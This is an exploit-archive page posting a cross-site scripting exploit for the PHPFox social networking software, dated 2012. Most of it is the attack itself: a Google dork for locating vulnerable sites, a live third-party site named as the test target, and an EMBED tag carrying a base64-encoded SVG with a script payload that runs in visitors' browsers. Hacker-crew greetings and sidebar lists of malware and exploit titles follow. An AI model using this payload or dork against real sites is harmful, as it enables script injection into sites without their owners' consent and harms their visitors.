PHPFox Cross Site Scripting

Posted on 25 February 2012

# Exploit Title: phpfox xss exploit # Google Dork: inurl:powered by phpof # Date: 25-02-2012 # Author: tRipLeZiX # Software Link: http://www.phpfox.com/ # Version: allversion # Tested on: http://www.tanaogi.com/marketplace/6/debot-was-here/ # CVE : exploit xss code <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3 cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy 8xOTk5 L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQwIiBoZWlnaH Q9IjIw MDAiIGlkPSJ4c3MiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydCgibW FhdiBr YWxvIHNheWEgdGVybGFsdSBnYW50ZW5nIEItKSIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> # tHx to: bobyhikaru,vycod,tukulesto,r3de,touya,hylal,bl4Ck_391N3 # Big Thx : indonesiancoder,indonesianhacker,explorercrew

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20